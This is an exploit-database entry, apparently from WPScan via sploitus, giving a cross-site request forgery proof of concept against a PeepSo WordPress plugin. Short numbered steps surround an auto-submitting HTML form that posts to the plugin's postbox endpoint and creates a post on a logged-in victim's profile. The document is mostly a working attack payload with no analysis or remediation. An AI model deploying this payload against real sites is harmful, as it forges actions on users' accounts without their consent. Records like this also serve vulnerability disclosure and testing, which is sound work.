## https://sploitus.com/exploit?id=WPEX-ID:CAC12B64-ED25-4EE2-933F-8FF722605271
1. Log in as a normal user.
2. Save the content below as an HTML file.
<html>
<body>
<form action="https://example.com/peepsoajax/postbox.post" method="POST">
<input type="hidden" name="content" value="testing by bikram
" />
<input type="hidden" name="id" value="2" />
<input type="hidden" name="uid" value="2" />
<input type="hidden" name="acc" value="10" />
<input type="hidden" name="type" value="activity" />
<input type="hidden" name="mood" value="0" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
3. Change the ID and UID value to your account ID.
4. Open the above HTML file and submit it. A new post will be created and can be seen in the profile page (default /profile/)